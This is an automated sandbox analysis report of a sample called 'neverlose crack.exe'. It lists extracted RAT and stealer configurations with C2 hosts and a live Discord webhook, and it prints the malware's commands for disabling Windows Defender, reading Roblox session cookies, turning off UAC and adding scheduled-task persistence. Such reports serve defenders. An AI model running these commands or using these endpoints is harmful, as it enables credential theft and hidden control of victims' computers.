Analysis

  • max time kernel
    30s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    02-09-2024 09:18

General

  • Target

    neverlose crack.exe

  • Size

    295KB

  • MD5

    01cc2b2bcef2f12ab9a10905f999027d

  • SHA1

    c62bb9b1532dc3f8638cc1ab5eb3b5f5185c2b40

  • SHA256

    d51154dab49e7c3199cb9fd75aa5c7f9eb58ed74c8ea5eb40601ee484dc0b578

  • SHA512

    025af3ae3fa059e364ef933cff47327436f08fb18379377caf7e71ced86f2c8adb4f56a79a643f3072c21b06e9e9b97f5945b9bdff1d29e798c6d9a5c3360d5c

  • SSDEEP

    6144:DVOuy8Et9vsiTzIpoOhYyC8M4i7jyVvdOe4BWH5Y5/zu4cCGb19e:bFigGOTCz17jy9Yer6dzIpi

Malware Config

Extracted

Family

xworm

C2

meeting-compound.gl.at.ply.gg:44256

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

asyncrat

Botnet

Victim

C2

127.0.0.1:1504

127.0.0.1:44256

meeting-compound.gl.at.ply.gg:1504

meeting-compound.gl.at.ply.gg:44256

Attributes
  • delay

    1

  • install

    true

  • install_file

    System.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1273828074898718851/qR9eE6omxJxFL_jVry1J18IsVQ6bHhsk5rGr5VLxyO-92VJHyGPK43BBNMWtaUG56gE2

Extracted

Family

njrat

Version

<- NjRAT 0.7d Horror Edition ->

Botnet

Victim

C2

meeting-compound.gl.at.ply.gg:1504

Mutex

f8ff2d3def0ea5927a14148fb1c0ef4a

Attributes
  • reg_key

    f8ff2d3def0ea5927a14148fb1c0ef4a

  • splitter

    Y262SUCZ4UJJ

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\neverlose crack.exe
    "C:\Users\Admin\AppData\Local\Temp\neverlose crack.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Users\Admin\AppData\Local\Temp\WizClient.exe
      "C:\Users\Admin\AppData\Local\Temp\WizClient.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3040
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\Admin\AppData\Roaming\WizClient.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:316
    • C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe
      "C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1764
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1104
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD5D5.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:2920
        • C:\Users\Admin\AppData\Roaming\System.exe
          "C:\Users\Admin\AppData\Roaming\System.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1416
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        3⤵
        • Views/modifies file attributes
        PID:1904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1956
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3048
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2572
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2652
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1044
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2996
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:3012
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2704
        • C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe
          "C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Windows\System32\attrib.exe
            "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec"
            3⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2568
          • C:\Windows\System32\attrib.exe
            "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec\$77svchost.exe"
            3⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2700
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp37E2.tmp.bat""
            3⤵
            • Loads dropped DLL
            PID:1520
            • C:\Windows\system32\timeout.exe
              timeout 3
              4⤵
              • Delays execution with timeout.exe
              PID:1388
            • C:\Users\Admin\Exec\$77svchost.exe
              "C:\Users\Admin\Exec\$77svchost.exe"
              4⤵
              • Executes dropped EXE
              PID:2508
        • C:\Users\Admin\AppData\Local\Temp\Payload.exe
          "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1864
          • C:\Users\Admin\AppData\Local\Temp\dllhost.exe
            "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
            3⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            PID:1716
            • C:\Windows\SysWOW64\attrib.exe
              attrib +h "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:944
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /delete /tn CleanSweepCheck /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1948
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\Users\Admin\AppData\Local\Temp\dllhost.exe
              4⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1896
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2680
              • C:\Windows\SysWOW64\reg.exe
                reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                5⤵
                • UAC bypass
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:2784
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:600

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Payload.exe

        Filesize

        54KB

        MD5

        29527eb6dd3c1e2b8dbc17d70ad1fb20

        SHA1

        8fafd2e9914b32797c957f58a1254afc7dccf5af

        SHA256

        dafc09f9798d4c1134845b08749c514a3478ed4a45837e12fd717012ec27c694

        SHA512

        52e315cd12482d8a147e5d810e7fbb116cc15b4163e3015f5d579b0621980a15195a4354528bce24a3aff1e47766d95dea71f09563da8e43c781020006bb0e00

      • C:\Users\Admin\AppData\Local\Temp\tmp37E2.tmp.bat

        Filesize

        143B

        MD5

        b705ac94140086ed90e28784ca1b6e90

        SHA1

        a31d69b069941f681993f78f6760ca5cc3b0940a

        SHA256

        c2b28a9f443218f2e3cda97cb81c9cb5579413eb7b4761830baa176ea6cc7223

        SHA512

        de5c888a86d48db3bf3a051e60509c1cce4c10673a2946536833f67cd7724097fd34df2d0f116a1de1708b675176f8a50499d4b6e72c0809d1b77390b28e58be

      • C:\Users\Admin\AppData\Local\Temp\tmpD5D5.tmp.bat

        Filesize

        150B

        MD5

        c31134246fd64a2a89ed09212dadc869

        SHA1

        8fcfc50a78841df2db333cbdfb0d83594d942f2f

        SHA256

        82850cc7129372f1e831e9b25e7f670cbaa6ad6a8ac92f0a3174b306492b7ddf

        SHA512

        6590f3d3bc1f84718094b03fadb0a1d2c6e52a68c243d4476fe0e9fffc3248aba10e1311ff2ae6ddd1fa4a3d77bfcea364b9a7fc44fc850be3feb4507786ff7d

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GBRWHO5ASGU77MV3TKWM.temp

        Filesize

        7KB

        MD5

        55ce723006784e58b8e0f7fcbad072c0

        SHA1

        874479668107d958f5a1278b1a79f507c06c57d8

        SHA256

        dd3c9fe76fbfea294afd6731c5c36a333705d0831fbdf577d268846bc18907a6

        SHA512

        40b8d392c400bf37a32af729f5b39cfb725b216f5814b4aca11faa666dfe85f56908e937b74ebd4e8ca8b0abfa8b4e3afa634d8dcdf6f140fb33f35bf6a52af6

      • \Users\Admin\AppData\Local\Temp\INSTALLER1.exe

        Filesize

        63KB

        MD5

        6c575ec28ef4f6108f2acf9775938100

        SHA1

        c3b5d9f59b53768817d3c6dd93a49cef5a40a9e2

        SHA256

        609d9f9c8da8f777e17ff1a716c07e39e3b2d7fd76086436cf2e2383fe8bcd8c

        SHA512

        950f48b90492b7f0ac702c2cfd8822eab510819024fbcba2407217280e9d069c39aeae27f4bd6e6ce37efc9de52fad52ad15a07b8ce43c58f43bb5926278ddd5

      • \Users\Admin\AppData\Local\Temp\Umbral.exe

        Filesize

        229KB

        MD5

        62099472f40d33f1caf73e36e866b9e7

        SHA1

        9d1e27b780ba14d0e41d366d79b0f42d4a782e7e

        SHA256

        f343ca46350a3c48f888be39bf1247fcab2bcd731889fc16828aac5f681edebc

        SHA512

        3356bd93afdff76dfc995b8bba3fc96d772e371c3ae6f289cbdb58cffef4906a5f8c2755152765c8cc96b5fc61e97186e42eceaa5e8619d15e172441c95f9764

      • \Users\Admin\AppData\Local\Temp\WizClient.exe

        Filesize

        61KB

        MD5

        d63d40b2af636f58cfbabe878e42f0a7

        SHA1

        3f97fb34eceff4e64cd3adb6f5cb4f1fabaf06ed

        SHA256

        536699ce7a068f324c719b4f429bf0aefb82602fcc18ca4d99d76aa53fbdb19a

        SHA512

        e8d771744ad9b2fc85b6f7c655f0e24bd0e42fa4a6575ed4e3301c325750c6e52dbc0b8565b30adf1303986d026d9a4d6a936a9093be8707a8ddbac7933242b4

      • \Users\Admin\AppData\Local\Temp\WmZWbh4b.exe

        Filesize

        40KB

        MD5

        47f267290124f530b9c04563b533db83

        SHA1

        fccb81909c612554fce4303daeffc750a71ee44e

        SHA256

        479db498a032418957c1616b13187402d7f626afa32dd4fcf56313d78ec23eeb

        SHA512

        a81b1ca99fec7a536eabc62f57668e46b832e534ccba43f3ab25a9d33d394745d24bad5f72225244f20be5ddcb44529d72efa31b92bc9e03f34e3b9ddb4f9e3a

      • memory/1044-111-0x00000000026F0000-0x00000000026F8000-memory.dmp

        Filesize

        32KB

      • memory/1416-69-0x0000000000B60000-0x0000000000B76000-memory.dmp

        Filesize

        88KB

      • memory/1764-38-0x0000000001330000-0x0000000001346000-memory.dmp

        Filesize

        88KB

      • memory/1880-36-0x000000013F620000-0x000000013F62E000-memory.dmp

        Filesize

        56KB

      • memory/2008-71-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

        Filesize

        32KB

      • memory/2008-70-0x000000001B610000-0x000000001B8F2000-memory.dmp

        Filesize

        2.9MB

      • memory/2500-39-0x0000000000FD0000-0x0000000001010000-memory.dmp

        Filesize

        256KB

      • memory/2508-129-0x000000013F6F0000-0x000000013F6FE000-memory.dmp

        Filesize

        56KB

      • memory/3016-58-0x0000000001D20000-0x0000000001D28000-memory.dmp

        Filesize

        32KB

      • memory/3016-57-0x000000001B840000-0x000000001BB22000-memory.dmp

        Filesize

        2.9MB

      • memory/3040-37-0x0000000000040000-0x0000000000056000-memory.dmp

        Filesize

        88KB